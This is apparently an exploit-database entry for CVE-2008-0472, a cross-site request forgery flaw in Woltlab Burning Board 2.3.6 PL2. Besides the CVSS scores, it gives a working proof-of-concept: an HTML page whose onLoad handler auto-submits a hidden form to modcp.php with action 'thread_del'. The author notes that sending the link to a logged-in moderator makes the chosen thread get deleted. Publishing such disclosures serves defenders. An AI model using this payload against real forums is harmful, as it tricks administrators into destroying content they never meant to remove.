Woltlab Burning Board 2.3.6 PL2 Remote Delete Thread XSRF Vulnerability

2008.01.29

Credit: NBBN

Risk: Low

Local: No

Remote: Yes

CVE: CVE-2008-0472

CWE: CWE-352

CVSS Base Score: 4.3/10

Impact Subscore: 2.9/10

Exploitability Subscore: 8.6/10

Exploit range: Remote

Attack complexity: Medium

Authentication: No required

Confidentiality impact: None

Integrity impact: Partial

Availability impact: None

########################################################
Woltlab Burning Board 2.3.6 PL2 Remote Delete Thread XSRF Vulnerability
by NBBN
Founed: December 2007 Type: Cross-Site Request Forgery
########################################################
Code:
<html>
<head>
</head>
<body onLoad="javascript:document.it.submit()">
<form action="http://localhost/xampp/wbb2/modcp.php" method="post" name="it">
<input type="hidden" name="action" value="thread_del" />
<input type="hidden" name="threadid" value="5" /> <!-- Here the thread-id -->
<input type="hidden" name="send" value="send" />
<input type="hidden" name="sid" value="" />
<input type="submit" accesskey="S" value="Ja" class="input" />
</body>
</html>
An attacker can send a link to a site with this code to a
moderator/administrator and then the thread with the threadid are going to be
deleted, when the mod/admin is logged in.
(Sorry for my bad english ;-) )

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Woltlab Burning Board 2.3.6 PL2 Remote Delete Thread XSRF Vulnerability

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.